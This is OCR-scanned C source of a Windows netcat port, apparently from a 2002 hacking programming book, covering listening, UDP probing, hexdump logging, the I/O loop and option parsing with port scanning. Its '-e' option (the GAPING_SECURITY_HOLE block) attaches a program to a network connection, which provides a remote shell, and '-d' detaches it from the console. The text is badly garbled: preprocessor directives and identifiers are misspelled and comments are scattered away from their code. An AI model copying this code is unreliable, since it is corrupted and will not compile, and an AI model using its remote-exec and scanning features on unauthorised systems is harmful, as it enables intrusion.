iendif 

nnetfd = rr; 



/* retval for accept */ 
/* wrap this In a timer, too; 0 



/* timeout */ 



/* dump the old socket */ 
/* here' s our new one */ 



forever */ 



whoisit : 

if (rr < 0) 

goto dol__err; 



/* bail out if any errors so far */ 



/* Various things that follow temporarily trash bigbuf_net, which might contain 
a copy of any recvfrom()ed packet, but we'll read() another copy later. */ 



/* if we wont see it, we dont care */ 



/* If we can, look for any IP options. Use fui for testing the receiving end of 
such things, and is a good exercise in dealing with it. We do this before 
the connect message, to ensure that the connect msg is uniformly the LAST 
thing to emerge after ali the intervening crud. Doesn't work for UDP on 
any machines I've tested, but feel free to surprise me. */ 
/* iifdef IP_OPTIONS */ 
iifndef WIN32 

if (! o_verbose) 
goto dol_noop; 
optbuf = Hmalloc (40) ; 
x = 40; 

rr = getsockopt (nnetfd, IPPROTO_IP, IP_OPTIONS, optbuf, &x) 
if (rr < 0) 

holler ("getsockopt failed") ; 
Debug ( ("ipoptions ret len %d", x) ) 

if (x) { /* we've got options 

unsigned char * q = (unsigned char *) optbuf; 



lessee em. 



*/ 



1), 



char * p = bigbuf_net; 
char * pp = Sbigbuf_net [128] ; 
memset (bigbuf_net, 0, 256); 
while (x > 0) { 

sprint f (pp, "%2.2x 

strcat (p, pp) ; 

q++; p++; 

x — ; 

; 

holler ("IP options: %s 
} /* if x, i.e 
dol_noop : 

iendif /* IP_OPTIONS 



/* locai variables, yuk! */ 

/* get random space farther out. . . */ 

/* clear it ali first */ 

/* clumsy, but works: turn into hex */ 
/* and build the final string */ 



bigbuf_net) ; 



any options */ 
*/ 



/* find out what address the connection was *to* on our end, in case we 're 
doing a listen—on—any on a multihomed machine. This allows one to 
offer different services via different alias addresses, such as the 
"virtual web site" hack. */ 

memset (bigbuf_net, 0, 64); 

cp = &bigbuf__net [32 ] ; 

x = sizeof (SA) ; 

rr = getsockname (nnetfd, (SA *) lclend, &x) ; 
if (rr < 0) 

holler ("post—rcv getsockname failed") ; 
strcpy (cp, inet_ntoa (lclend->sin_addr) ) ; 



* now check out who it is. We don't care about mismatched DNS names here, 
but any ADDR and PORT we specified had better fucking well match the Caller. 
Converting from addr to inet_ntoa and back again is a bit of a kludge, but 
gethostpoop wants a string and there's much gnarlier code out there already, 
so I don 't feel bad. 

The *real* question is why BFD sockets wasn't designed to allow listens for 
connections *from* speci fic hosts/ports, instead of requiring the Caller to 
accept the connection and then reject undesireable ones by closing . */ 
z = ntohs (remend— >sin_port) ; 

strcpy (bigbuf_net, inet_ntoa (remend->sin_addr) ) ; 
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/* use as a flag. . . */ 



ermo = 0; 
x = 0; 
if (rad) 

if (memcmp (rad, whozis->iaddrs , sizeof (SA) ) ) 

x = 1; 
if (rp) 

if (z != rp) 

x = 1; 

if (x) /* guilty! */ 

bail ( "invalid connection to [%s] from %s [%s] %d", 
cp, whozis->name, whozis->addrs [0] , z) ; 

holler ("connect to [%s] from %s [%s] %d", /* oh, you're okay.. */ 

cp, whozis->name, whozis->addrs [0] , z) ; 



return (nnetfd) ; 



/* open! */ 



dol_tmo: 

ermo = ETIMEDOUT ; 
dol_err: 
Hfdef WIN32 

closesocket (nnetfd) ; 
#else 

dose (nnetfd) ; 
iendif 

return (-1) ; 
} /* dolisten */ 



/* fake it */ 



/* udptest : 

fire a couple of packets at a UDP target port, just to see if it 's really 
there. On BSD kernels, ICMP host/port-unreachable errors get delivered to 
our socket as ECONNREFUSED write errors. On SV kernels, we lose; we'll have 
to collect and analyze raw ICMP ourselves a la satan 's probe_udp_ports 
backend. Guess where could swipe the appropriate code from. . . 

Use the time delay between writes if given, otherwise use the "tcp ping" 
trick for getting the RTT . [I got that idea from pluvius, and warped it.] 
Return either the originai fd, or clean up and return —1 . */ 
udptest (fd, where) 

int fd; 

IA * where; 

{ 

register int rr; 



Hfdef WIN32 

rr = send (fd, bigbuf_in, 1, 0) ; 
#else 

rr = write (fd, bigbuf_in, 1) ; 
iendif 

if (rr != 1) 

holler ("udptest first write failed?! ermo %d", ermo); 
if (o__wait) 

sleep (o_wait) ; 
else { 

/* use the tcp— ping trick: try connecting to a normally refused port, which 
causes us to block for the time that SYN gets there and RST gets back. 
Not completely reliable, but it *does* mostly work. */ 
o_udpmode = 0; /* so doconnect does TCP this time */ 

/* Set a temporary connect timeout , so packet filtration doesnt cause 
us to hang forever, and hit it */ 
o_wait = 5; /* XXX: enough to notice?? */ 

rr = doconnect (where, SLEAZE_PORT, 0, 0) ; 
if (rr > 0) 
Hfdef WIN32 

closesocket (rr) ; 

#else 

dose (rr) ; 

iendif 

o_wait = 0; 
o_udpmode++ ; 
} /* if o_wait */ 
ermo = 0; 
Hfdef WIN32 

rr = send (fd, bigbuf_in, 1, 0) ; 
#else 

rr = write (fd, bigbuf_in, 1) ; 
iendif 



/* in case it *did* open */ 

/* reset it */ 
/* we *are* stili doing UDP, right? */ 

/* clear from sleep */ 
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return (fd) ; 
iifdef WIN32 

closesocket (fd) ; 
#else 

dose (fd) ; /* use it or lose it! */ 

iendif 

return (-1) ; 
} /* udptest */ 



/* oprint : 

Hexdump bytes shoveled either way to a running logfile, in the format : 

D offset - - - - 16 bytes - - - - # . . . . ascii 

where "which" sets the direction indicator, D: 

0 — sent to network, or ">" 

1 — rcvd and printed to stdout, or "<" 

and "buf" and "n" are data-block and length. If the current block generates 
a partial line, so be it; we *want* that lockstep indication of who sent 
what when. Adapted from dgaudet's originai example — but must be ripping 
*fast*, since we don't want to be too disk-bound. . . */ 
void oprint (which, buf, n) 

int which; 

char * buf; 

int n; 

{ 

int bc; /* in buffer count */ 

int obc; /* current "global " offset */ 

int soc; /* stage write count */ 

register unsigned char * p; /* main buf ptr; m.b. unsigned here */ 

register unsigned char * op; /* out hexdump ptr */ 

register unsigned char * a; /* out asc-dump ptr */ 

register int x; 

register unsigned int y; 



if (! ofd) 

bail ("oprint called with no open fd?!"); 
if (n == 0) 
return; 



op = stage; 
if (which) { 

*op = '<'; 

obc = wrote_out; 
} else { 

*op = •>•; 

obc = wrote_net; 

} 

op++; 

*op = ' '; 

p = (unsigned char *) buf; 
bc = n; 

stage [59] = '#<; 
stage [60] = ' '; 



/* use the globals! */ 



/* preload "direction" */ 



/* preload separator */ 



while (bc) { /* for chunk—o—data ... */ 

x = 16; 

soc = 78; /* len of whole formatted line */ 

if (bc < x) { 

soc = soc — 16 + bc; /* fiddle for however much is left */ 

x = (bc * 3) + 11; /* 2 digits + space per, after D & offset */ 

op = Sstage [x] ; 

x = 16 — bc; 

while (x) { 

*op++ = ' ' ; /* preload filler spaces */ 

*op++ = ' ' ; 
*op++ = ' ' ; 
x — ; 

} 

x = bc; /* re—fix current linecount */ 

) /* if bc < x */ 



bc —= x; /* fix wrt current line size */ 

sprint f (&stage[2] , "%8.8x ", obc); /* xxx: stili slow? */ 

obc += x; /* fix current offset */ 

op = Sstage [11] ; /* where hex starts */ 

a = Sstage [61] ; /* where ascii starts */ 
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y = (int) (*p » 4); /* hi half */ 

*op = hexnibs [y] ; 

op++; 

y = (int) (*p S OxOf); /* lo half */ 

*op = hexnibs [y] ; 

op++; 

*op = ' '; 
op++; 

if ((*p > 31) SS (*p < 127)) 

*a = *p; /* printing */ 

else 

*a = ' . ' ; /* nonprinting, loose def */ 

a++; 
p++; 
x — ; 

} /* while x */ 

*a = '\n'; /* finish the line */ 

x = write (ofd, stage, soc) ; 
if (x < 0) 

bail ("ofd write err") ; 
) /* while bc */ 
} /* oprint */ 

Hfdef TELNET 

USHORT o_tn = 0; /* global -t option */ 

/* atelnet : 

Answer anything that looks like telnet negotiation with don't/won't. 

This doesn 't modify any data buffers, update the global output count, 

or show up in a hexdump — it just shits into the outgoing stream. 

Idea and codebase from Mudge@10pht.com. */ 
void atelnet (buf, size) 

unsigned char * buf; /* has to be unsigned here! */ 

unsigned int size; 

{ 

static unsigned char obuf [4]; /* tiny thing to build responses into */ 

register int x; 

register unsigned char y; 

register unsigned char * p; 

y = 0; 
p = buf; 
x = size; 
while (x > 0) { 

if (*p != 255) /* IAC? */ 

goto notiac; 

obuf [01 = 255; 

p++; x—; 

if ((*p == 251) Il (*p == 252)) /* WILL or WONT */ 

y = 254; /* -> DONT */ 

if ((*p == 253) Il (*p == 254)) /* DO or DONT */ 

y = 252; /* -> WONT */ 

±f (y) { 

obuf [1] = y; 
p++; x — ; 

obuf [2] = *p; /* copy actual option byte */ 

Hfdef WIN32 

(void) send (netfd, obuf, 3, 0) ; /* one line, or the whole buffer */ 

#else 

(void) write (netfd, obuf, 3) ; 

iendif 

/* if one wanted to bump wrote__net or do a hexdump line, here ' s the place */ 
y = 0; 
) /* if y */ 
notiac: 

P++; x — ; 
} /* while x */ 
} /* atelnet */ 
iendif /* TELNET */ 



/* readwrite : 

handle stdin/stdout/network I/O. Bwahaha! ! — the select loop from hell. 
In this instance, return what might become our exit status. */ 
int readwrite (fd) 




Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



ielse 

int fd; 
iendif 
{ 

register int rr; 
register char * zp; 
register char * np; 
unsigned int rzleft; 
unsigned int rnleft; 
USHORT netretry; 
USHORT wretry; 
USHORT wfirst; 



/* stdin buf ptr */ 
/* net-in buf ptr */ 



/* net-read retry counter */ 

/* net-write sanity counter */ 

/* one-shot flag to skip first net read */ 



iifdef WIN32 /* (weld) WIN32 must poli because of weak stdin handling so we need a 

short timer */ 

struct timeval timer3; 
int istty; 

time_t start, current; 
int foo; 



timer3 .tv_sec = 0; 
timer3 .tv_usec = 1000; 



/* save the time so we can bail when we reach timeout */ 
time ( Sstart ) ; 



/* sets stdin and stdout to binary so no crlf translation if its a tty */ 
if (!_isatty( 1 )) 

_setmode( 1, _0_BINARY ); 

if ((istty = _isatty( 0 ) ) == FALSE) 

__setmode( 0, _0_BINARY ); /* (weld) I think we want to do this */ 



iendif 



/* if you don't have ali this FD__* macro hair in sys/types.h, you'll have to 
either find it or do your own bit—bashing: *dingl /= (1 « fd) , etc. . . */ 
iifndef WIN32 /* fd is not implemented as a real file handle in WIN32 */ 
if (fd > FD_SETSIZE) { 

holler ( "Preposterous fd value %d", fd) ; 
return (1) ; 

} 

iendif 

FD_SET (fd, dingl) ; /* global : the net is open */ 

netretry = 2; 

wfirst = 0; 

rzleft = rnleft = 0; 

if (insaved) { 

rzleft = insaved; /* preload multi— mode fakeouts */ 

zp = bigbuf_in; 



wfirst = 1; 

if (Single) /* if not scanning, this is a one—off first */ 

insaved = 0; /* buffer left over from argv construction, */ 

else { 

FD_CLR (0, dingl); /* OR we've already got our repeat chunk, */ 

dose (0) ; /* so we won't need any more stdin */ 

} /* Single */ 
} /* insaved */ 



if (o_interval) 

sleep (o_interval) ; /* pause *before* sending stuff, too */ 

ermo = 0; /* clear from sleep */ 

iifdef WIN32 

WSASetLastError (0) ; 
iendif 



/* and now the big ol ' select shoveling loop 



*/ 



while (FD_ISSET (fd, 
wretry = 8200; 
if (wfirst) { 

wfirst = 0; 

goto shovel; 

} 



dingl)) { 



/* i.e. till the *net* closes ! */ 
/* more than we'll ever hafta write 
/* any saved stdin buffer? */ 
/* clear flag for the duration */ 
/* and go handle it first */ 
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/* some systems, notably linux, crap into their select timers on return, so 
we create a expendable copy and give *that* to select. *Fuck* me ... */ 
if (timerl) 

memcpy (timer2, timerl, sizeof (struct timeval)); 
iifdef WIN32 /* (weld) we must use our own small timeval to poli */ 

rr = select (16, ding2, 0, 0, Stimer 3) ; /* here it is, kiddies */ 
#else 

rr = select (16, ding2, 0, 0, timer2) ; /* here it is, kiddies */ 
iendif 

if (rr < 0) { 
iifdef WIN32 

if (h_errno != WSAEINTR) { /* might have gotten "Zed, etc ?*/ 

ielse 
iendif 



iifdef WIN32 

ielse 

iendif 



if (ermo != EINTR) { 

foo = h_errno ; 

holler ("select fuxored"); 

closesocket (fd) ; 

dose (fd); 

return (1) ; 

} 



/* might have gotten n Zed, etc ?*/ 



} /* select fuckup */ 
/* if we have a timeout AND stdin is closed AND we haven't heard anything 

from the net during that time, assume it 's dead and dose it too. */ 
iifndef WIN32 /* (weld) need to write some code here */ 

if (rr == 0) { 



if ( ! FD_ISSET (0, dingl ) ) 

netretry — ; 
if (! netretry) { 
if (o_verbose > 1) 

holler ("net timeout") , 
dose (fd) ; 
return (0) ; 
} 



/* we actually try a coupla times . 
/* normally we don 't care */ 

/* not an errori */ 



*/ 



} /* select timeout */ 
ielse 

if (rr == 0) { 

time ( Scurrent ) ; 

if ( o__wait > 0 && (current - start) > timer l->tv_sec) { 

if (o_verbose > 1) /* normally we don 't care */ 

holler ("net timeout"); 
closesocket (fd) ; 
FD_ZERO (dingl ) ; 
WSASetLastError (0) ; 

return (0) ; /* not an errori */ 

} 

) /* select timeout */ 
iendif 

/* xxx: should we check the exception fds too? The read fds seem to give 
us the right info, and none of the examples I found bothered. */ 

/* Dingl ! Something arrived, go check ali the incoming hoppers , net first */ 

if (FD_ISSET (fd, ding2)) { /* net: ding! */ 

iifdef WIN32 

// reset timer 

time ( Sstart ) ; 



rr = recv (fd, bigbuf_net, BIGSIZ, 0) ; 

ielse 

rr = read (fd, bigbuf_net, BIGSIZ); 

iendif 

if (rr <= 0) { 

FD_CLR (fd, dingl); 
rzleft = 0; 
} else { 

rnleft = rr; 
np = bigbuf_net; 
iifdef TELNET 

if (o__tn) 

atelnet (np, rr) ; 
iendif /* TELNET */ 

} /* if rr */ 
Debug (("got %d from the net, ermo %d", rr, ermo)) 



/* net closed, we ' 11 finish up. . . */ 
/* can't write anymore: broken pipe */ 



/* fake out telnet stuff */ 
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/* if we're in "slowly" mode there's probably stili stuff in the stdin 

buffer, so don't read unless we really need MORE INPUT! MORE INPUT! */ 
if (rzleft) 

goto shovel; 



/* okay, suck more stdin */ 
iifndef WIN32 

if (FD_ISSET (0, ding2)) { 

rr = read (0, bigbuf_in, BIGSIZ); 



/* stdin: ding! */ 



at end, or fukt, or . . . 
disable and dose stdin 



*/ 
*/ 



/* xxx : maybe make reads here smaller for UDP mode, so that the subsequent 
writes are smaller — 1024 or something? "oh, frag it", etc, although 
mobygrams are kinda fun and exercise the reassembler. */ 
if (rr <= 0) { /* 
FD_CLR (0, dingl); /* 
dose (0) ; 
} else { 

rzleft = rr; 
zp = bigbuf_in; 

/* special case for multi— mode — we '11 want to send this one buffer to every 
open TCP port or every UDP attempi, so save its size and clean up stdin */ 



} /* 
ielse 



if (! Single) { 

insaved = rr; 

FD_CLR (0, dingl); 

dose (0) ; 
} /* Single */ 
/* if rr/ read */ 
stdin : ding */ 



/* we might be scanning . . . */ 
/* save len */ 

/* disable further junk from stdin */ 
/* really, I mean it */ 



if (istty) 
/* 
/* 
if 



{ 

(weld) cool, we can actually peek a tty and not have to block */ 
needs to be cleaned up */ 



/ 



*/ 



(kbhitO) { 

bigbuf_in [0] = getche () ; 
gets (bigbuf_in) ; 
strcat (bigbuf_in, "\n ") ; 
rr = strlen (bigbuf_in) ; 
rzleft = rr; 
zp = bigbuf_in; 

/* special case for multi— mode — we '11 want to send this one buffer to every 
open TCP port or every UDP attempt, so save its size and clean up stdin */ 

if (! Single) { /* we might be scanning. . . */ 

insaved = rr; /* save len */ 

dose (0) ; /* really, I mean it */ 



} else 



} 
{ 

/* (weld) 
rr - read 
if (rr <= 



this is gonna block until a <cr> so it kinda sucks */ 
(0, bigbuf_in, BIGSIZ); 

0) { /* at end, or fukt, 

(0); 



or . . . */ 

dose 
} else { 

rzleft = rr; 
zp = bigbuf_in; 

/* special case for multi— mode — we ' 11 want to send this one buffer to every 
open TCP port or every UDP attempt, so save its size and clean up stdin */ 

if (! Single) { /* we might be scanning . . . */ 

insaved = rr; /* save len */ 

dose (0) ; /* really, I mean it */ 

} /* Single */ 
} /* if rr/read */ 

} 



iendif 
shovel : 

/* now that we've dingdonged ali our thingdings, send off the results . 
Geez, why does this look an awful lot like the big loop in "rsh"? . . . 
not sure if the order of this matters, but write net -> stdout first . */ 



/* sanity check. Works because they're both unsigned. . . */ 
if ( (rzleft > 8200) / / (rnleft > 8200) ) { 

holler ( "Preposterous Pointers: %d, %d", rzleft, rnleft) ; 
rzleft = rnleft = 0; 

} 
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holler ("too many output retries") ; 
return (1) ; 

} 

if (rnleft) { 

rr = write (1, np, rnleft); 
if (rr > 0) { 
if (o^wfile) 

oprint (1, np, rr) ; /* log the stdout */ 

np += rr; /* fix up ptrs and whatnot */ 

rnleft -= rr; /* vili get sanity-checked above */ 

wrote_out += rr; /* global count */ 

} 

Debug (("wrote %d to stdout, ermo %d", rr, ermo)) 
} /* rnleft */ 
if (rzleft) { 

if (o__interval) /* in "slowly" mode ?? */ 

rr = findline (zp, rzleft) ; 
else 

rr = rzleft; 
iifdef WIN32 

rr = send (fd, zp, rr, 0) ; /* one line, or the whole buffer */ 

#else 

rr = write (fd, zp, rr) ; /* one line, or the whole buffer */ 

iendif 

if (rr > 0) { 
zp += rr; 
rzleft -= rr; 

wrote_net += rr; /* global count */ 

} 

Debug (("wrote %d to net, ermo %d", rr, ermo)) 
} /* rzleft */ 

if (o_interval) { /* cycle between slow lines, or ... */ 

sleep (o__interval) ; 

ermo = 0; /* clear from sleep */ 

continue; /* . . .with hairy select loop. . . */ 

} 

if ((rzleft) Il (rnleft)) { /* shovel that shit till they ain't */ 

wretry — ; /* none left, and get another load */ 

goto shovel; 

} 

} /* while dingl :netfd is open */ 

/* XXX: maybe want a more graceful shutdown() here, or screw around with 
Unger times?? I suspect that I don't need to since I'm always doing 
blocking reads and writes and my own manual "last ditch" efforts to read 
the net again after a timeout. I haven't seen any screwups yet, but it's 
not like my test network is particularly busy. . . */ 
Hfdef WIN32 

closesocket (fd) ; 
#else 

dose (fd) ; 
iendif 

return (0) ; 
} /* readwrite */ 

/* main : 

now we pulì it ali together . . . */ 
main (argc, argv) 

int argc; 

char * * argv; 

{ 

iifndef HAVE_GETOPT 

extern char * optarg; 

extern int optind, optopt; 
iendif 

register int x; 

register char *cp; 

HINF * gp; 

HINF * whereto = NULL; 
HINF * wherefrom = NULL; 
IA * ouraddr = NULL; 
IA * themaddr = NULL; 
USHORT o_lport = 0; 
USHORT ourport = 0; 

USHORT loport = 0; /* for scanning stuff */ 

USHORT hiport = 0; 
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char * randports = NULL; 
int cycle = 0; 

iifdef HAVE_BIND 

/* can *you* say "ce -yaddayadda netcat.c -lresolv -144bsd" on SunLOSs? */ 

res__init () ; 
iendif 

/* I was in this barbershop quartet in Skokie IL . . . */ 

/* round up the usuai suspeets, i.e. malloc up ali the stuff we need */ 
lclend = (SAI *) Hmalloc (sizeof (SA)); 
remend = (SAI *) Hmalloc (sizeof (SA) ) ; 
bigbuf_in = Hmalloc (BIGSIZ) ; 
bigbuf_net = Hmalloc (BIGSIZ) ; 
dingl = (fd_set *) Hmalloc (sizeof (fd__set) ) ; 
ding2 = (fd__set *) Hmalloc (sizeof (fd__set) ) ; 
portpoop = (PINF *) Hmalloc (sizeof (PINF) ) ; 

iifdef WIN32 

setsockopt^c = (char *)malloc (sizeof (char) ) ; 

*setsockopt_c = 1; 

iendif 

ermo = 0; 

gatesptr = 4; 
iifndef WIN32 

h__errno = 0; 
iendif 

/* catch a signal or two for cleanup */ 
iifdef NTFIXTHIS 

signal (SIGINT, catch) ; 

signal (SIGQUIT, catch) ; 

signal (SIGTERM, catch) ; 

signal (SIGURG, SIG_IGN) ; 
iendif 

recycle: 

/* if no args given at ali, get 'em from stdin and construct an argv. */ 
if (arge == 1) { 
cp = argv[0] ; 

argv = (char **) Hmalloc (128 * sizeof (char *)); /* XXX: 128? */ 

argv[0] = cp; /* leave old prog name intact */ 

cp = Hmalloc (BIGSIZ); 

argv[l ] = cp; /* head of new arg block */ 

fprintf (stderr, "Cmd line: "); 

fflush (stderr) ; /* I dont care if it ' s unbuffered or noti */ 

insaved = read (0, cp, BIGSIZ); /* we're gonna fake fgets() here */ 

if (insaved <= 0) 
bail ("wrong") ; 
x = findline (cp, insaved) ; 
if (x) 

insaved —= x; /* remaining chunk size to be sent */ 

if (insaved) /* which might be zero. . . */ 

memepy (bigbuf_in, Scp[x], insaved); 
cp = strchr (argv[l] , '\n'); 
if (cp) 

*cp = ' \ 0 ' ; 

cp = strchr (argv[l] , '\r'); /* look for *M too */ 

if (cp) 

*cp = ' \ 0 ' ; 

/* find and stash pointers to remaining new "args" */ 
cp = argv[l]; 

cp++; /* skip past first char */ 

x = 2; /* we know argv 0 and 1 already */ 

for (; *cp != '\0'; cp++) { 
if (*cp ==<<){ 
*cp = '\0'; /* smash ali spaces */ 

continue; 
} else ( 
if (*(cp-l) == '\0<) { 
argv[x] = cp; 
x++; 

} 

} /* if space */ 
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} /* if no args given */ 

/* If your shitbox doesn't have getopt, step into the nineties already. */ 

/* optarg, optind = next-argv-component [i.e. flag arg] ; optopt = last-char */ 

while ( (x = getopt (argo, argv, "ade : g: G : hi : lLno :p : rs : tuvw: z") ) != EOF) { 
/* Debug (("in go: x now %c, optarg %x optind %d", x, optarg, optind)) */ 
switch (x) { 
case 'a' : 
bail ("all-A-records NIY") ; 
o_alla++; break; 
iifdef GAPING_SECURITY_HOLE 

case 'e': /* prog to exec */ 

prOOgie = optarg; 
break; 

iendif 

case 'li ' : /* listen then cycle back to start 

instead of exiting */ 
o_listen++; 
cycle = 1; 
break; 



case 'd': /* detach from console */ 

FreeConsole () ; ; 
break; 



case 'G': /* srcrt gateways pointer vai */ 

x = atoi (optarg) ; 

if ( (x) && (x == (x & Oxlc) ) ) /* mask off bits of fukt values */ 

gatesptr = x; 
else 

bail ("invalid hop pointer %d, must be multiple of 4 <= 28", x) ; 
break; 

case 'g' : /* srcroute hop[s] */ 

if (gatesidx > 8) 

bail ("too many -g hops") ; 
if (gates == NULL) /* eat this, Billy-boy */ 

gates = (HINF **) Hmalloc (sizeof (HINF *) * 10); 
gp = gethostpoop (optarg, o_nflag) ; 

if (gp) 

gates [gatesidx] = gp; 
gatesidx++; 
break; 
case 'h ' : 
ermo = 0; 
iifdef HAVE_HELP 

helpme () ; /* exits by itself */ 

ielse 

bail ("no help available, dork — RTFS") ; 

iendif 

case 'i': /* line—interval time */ 

o^interval = atoi (optarg) S Oxffff; 
iifdef WIN32 

o_interval *= 1000; 

iendif 

if (! o^interval) 

bail ( "invalid interval time %s 

break; 
case ' 1 ' : 

o_listen++; break; 
case 'n ' : 

o_nflag++; break; 
case ' o ' : 

stage = (unsigned char *) optarg; 

o__wfile++; break; 
case 'p ' : 

o_lport = getportpoop (optarg, 0) ; 

if (o_lport == 0) 

bail ( "invalid locai port %s", optarg); 

break; 

case 'r': /* randomize various things */ 

o__random++; break; 
case 's': /* locai source address */ 

/* do a full lookup [since everything else goes through the same mill] , 

unless —n was previously specified. In fact, careful placement of —n can 



optarg) ; 

/* listen mode */ 

/* numeric—only, no DNS lookups */ 
/* hexdump log */ 

/* locai source port */ 
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wherefrom = gethostpoop (optarg, o__nflag) ; 
ouraddr = &wherefrom->iaddrs [0] ; 
break; 
Hfdef TELNET 

case 't': /* do telnet fakeout 

o_tn++; break; 
iendif /* TELNET */ 



verbose 



*/ 
*/ 



wait tinte */ 



case 'u': /* use UDP 

o_udpmode++ ; break; 
case W: /* 

o_verbose++; break; 
case 'w' : /* 

o_wait = atoi (optarg) ; 

if (o_wait <= 0) 

bail ( "invalid wait-time %s", optarg); 

timerl = (struct timeval *) Hmalloc (sizeof (struct timeval) ) ; 

timer2 = (struct timeval *) Hmalloc (sizeof (struct timeval)); 

timerl->tv_sec = o_wait; /* we need two. see readwrite () . 

break; 

case 'z': /* little or no data xfer 

o_zero++; 
break; 
de fault : 
ermo = Or- 
bali ("ne -h for help") ; 
) /* switch x */ 
} /* while getopt */ 



/* other mise initialization */ 

iifndef WIN32 /* Win32 doesn't like to mix file handles and sockets */ 
Debug (("fd_set size %d", sizeof (*dingl) ) ) /* how big *is* it? */ 



FD_SET (0, dingl) ; 
iendif 

if (o_random) { 
SRAND (time (0) ) ; 
randports = Hmalloc (65536); 

) 

Hfdef GAPING_SECURITY_HOLE 
if (prOOgie) { 
dose (0) ; 
o_wfile = 0; 
ofd = 0; 

} 

iendif /* G_S_H */ 
if (o_wfile) { 

ofd = open (stage, 0_WRONLY / 0__CREAT / 0_TRUNC, 0664); 
if (ofd <= 0) 

bail ("can't open %s", stage); 
stage = (unsigned char *) Hmalloc (100); 

} 



/* stdin *is* initially open */ 



/* big flag array for ports */ 



/* won't need stdin */ 
/* -o with -e is meaningless ! 



/* must be > extant 0/1/2 */ 



/* optind is now index of first non —x arg */ 

Debug (("after go: x now %c, optarg %x optind %d", x, optarg, optind)) 
/* Debug (("optind up to %d at host—arg %s", optind, argv [optind] ) ) */ 
/* gonna only use first addr of host—list , like our IQ was normal; if you wanna 
get fancy with addresses , look up the list yourself and plug 'em in for now. 
unless we finally implement -a, that is. */ 
if (argv [optind] ) 

whereto = gethostpoop (argv[optind] , o_nflag) ; 
if (whereto && whereto— >iaddrs) 

themaddr = &whereto—>iaddrs [0] ; 
if (themaddr) 

optind++; 
ermo = 0; 
iifndef WIN32 
h_errno = 0; 
iendif 



/* skip past valid host lookup */ 



/* Handle listen mode here, and exit afterward. Only does one connect; 

this is arguably the right thing to do. A "persistent listen-and-fork" 
mode a la inetd has been thought about, but not implemented. A tiny 
wrapper script can handle such things . . . */ 
if (o__listen) { 

curport = 0; /* rem port *can* be zero here. . . */ 
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curport = getportpoop (argv [optind] , 0) ; 

if (curport == 0) /* if given, demand correctness */ 

bail ( "invalid port %s", argv [optind] ) ; 
} /* if port-arg */ 

netfd = dolisten (themaddr, curport, ouraddr, o__lport) ; 
/* dolisten does its own connect reporting, so we don 't holler anything here */ 

if (netfd > 0) { 
iifdef GAPING_SECURITY_HOLE 

if (prOOgie) /* -e given? */ 

doexec (netfd) ; 

iifdef WIN32 

if ( ìprOOgie) // doexec does the read/write for Win32 

iendif 



iendif /* GAPING__SECURITY_HOLE */ 

x = readwrite (netfd); /* it even works with UDP! */ 

if (o_yerbose > 1) /* normally we don 't care */ 

holler (wrote_txt, wrote_net, wrote_out) ; 
if (cycle == 1) 

goto recycle; 

exit (x) ; /* "pack out yer trash" */ 

) else 

bail ("no connection") ; 
} /* o_listen */ 

/* fall thru to outbound connect s . Now we're more picky about args. . . */ 
if (! themaddr) 

bail ("no destination" ) ; 
if (argv [optind] == NULL) 

bail ("no port[s] to connect to") ; 
if (argv[optind + 1]) /* look ahead: any more port args given? */ 

Single = 0; /* multi-mode, case A */ 

ourport = o_lport; /* which can be 0 */ 

/* everything from here down is treated as as ports and/or ranges thereof, so 
it's ali enclosed in this big ol ' argv-parsin' loop. Any randomization is 
done within each given *range* , but in separate chunks per each succeeding 
argument, so we can control the pattern somewhat . */ 
while (argv [optind] ) { 
hiport = loport - 0; 

cp = strchr (argv [optind] , '-'); /* nn-mm range? */ 
if (cp) { 

*cp = '\0'; 

cp++; 

hiport = getportpoop (cp, 0) ; 
if (hiport == 0) 
bail ("invalid port %s", cp) ; 
) /* if found a dash */ 

loport = getportpoop (argv [optind] , 0) ; 
if (loport == 0) 

bail ( "invalid port %s", argv [optind] ) ; 
if (hiport > loport) ( /* was it genuinely a range? */ 

Single = 0; /* multi-mode, case B */ 

curport = hiport; /* start high by default */ 

if (o^random) { /* maybe populate the random array */ 

loadports (randports, loport, hiport); 
curport = nextport (randports) ; 

} 

} else /* not a range, including args like "25-25" */ 

curport = loport; 
Debug (("Single %d, curport %d", Single, curport) ) 

/* Now start connecting to these things . curport is already preloaded. */ 
while (loport <= curport) { 

if ((! o_lport) SS (o__random) ) ( /* —p overrides random locai— port */ 

ourport = (RAND () S Oxffff); /* random local-bind — well above */ 
if (ourport < 8192) /* resv and any likely listeners??? */ 

ourport += 8192; /* xxx: may stili conflict; use -s? */ 

} 

curport = getportpoop (NULL, curport ) ; 

netfd = doconnect (themaddr, curport, ouraddr, ourport) ; 
Debug (("netfd %d from port %d to port %d", netfd, ourport, curport) ) 
if (netfd > 0) 
if (o_zero SS o udpmode) /* if UDP scanning . . . */ 

netfd = udptest (netfd, themaddr) ; 
if (netfd > 0) { /* Yow, are we OPEN YET? ! */ 
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holler ("%s [%s] %d (%s) open", 

whereto->name , whereto->addrs [0] , curport, portpoop->name) ; 
Hfdef GAPING_SECURITY_HOLE 

if (prOOgie) /* exec is valid for outbound, too */ 

doexec (netfd) ; 
iendif /* GAPING__SECURITY_HOLE */ 

if ( ! orzerò) 
Hfdef WIN32 

Hfdef GAPING_SECURITY_HOLE 

if ( ìprOOgie) // doexec does the read/write for Win32 

iendif 
iendif 

x = readwrite (netfd) ; /* go shovel shit */ 

} else { /* no netfd. . . */ 
x = 1; /* preload exit status for later */ 

/* if we' re scanning at a "one -v " verbosity level, don't print refusals. 

Give it another —v if you want to see everything . */ 
Hfdef WIN32 

if ((Single II (o_verbose > 1) ) Il (h__errno != WSAECONNREFUSED) ) 

#else 

if ((Single II (o_verbose > 1) ) Il (ermo ! = ECONNREFUSED) ) 

iendif 

holler ("%s [%s] %d (%s) ", 

whereto->name, whereto->addrs [0] , curport, portpoop->name ) ; 
} /* if netfd */ 
Hfdef WIN32 

closesocket (netfd); /* just in case we didn't already */ 

ielse 

dose (netfd); /* just in case we didn't already */ 

iendif 

if (o_interval) 

sleep (o_interval) ; /* if -i, delay between ports too */ 

if (o_random) 

curport = nextport (randports) ; 
else 

curport — ; /* just decrement ... */ 

) /* while curport within current range */ 
optind++; 

} /* while remaining port-args — end of big argv-ports loop*/ 
ermo = 0; 

if (o_verbose > 1) /* normally we don't care */ 

holler ("sent %d, rcvd %d", wrote_net, wrote__out) ; 

Hfdef WIN32 

WSACleanupO ; 
iendif 

if (cycle == 1) 

goto recycle; 



if (Single) 
exit (x) ; 
exit (0) ; 
return (0) ; 
} /* main */ 



/* give us status on one connection */ 
